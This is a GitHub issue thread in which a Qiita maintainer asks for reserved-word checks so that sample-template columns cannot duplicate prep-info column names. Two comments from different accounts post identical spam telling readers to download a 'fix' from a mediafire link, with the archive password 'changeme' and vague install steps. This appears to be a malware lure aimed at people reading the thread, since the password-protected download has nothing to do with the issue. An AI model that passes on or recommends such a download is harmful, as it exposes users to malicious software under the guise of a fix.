### ISSUE TITLE
Add reserved-word checking to sample-template load/update/extend functionality

### ISSUE THREAD

**Issue by charles-cowart** [qiita-spots/qiita#3429]
After reviewing base_metadata_template.py and sample_template.py, it appears that there is code to check that the proper required columns are present in a sample-template when it is loaded/updated/extended. There also needs to be a check to ensure that a loaded/updated/extended sample-template does not contain columns with names matching those found in our prep-info and similar files.

Duplicates will cause an error when a prep-info file is loaded into Qiita during an SPP run, because the underlying database table can't have two columns with identical names e.g.: 'well_id_384'.

The list of columns found in a prep-info file can be found in metapool by including it as a dependency or perhaps as simply a list of known reserved words to be modified manually.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by charles-cowart** [comment]
Superseded by https://github.com/biocore/mg-scripts/issues/150
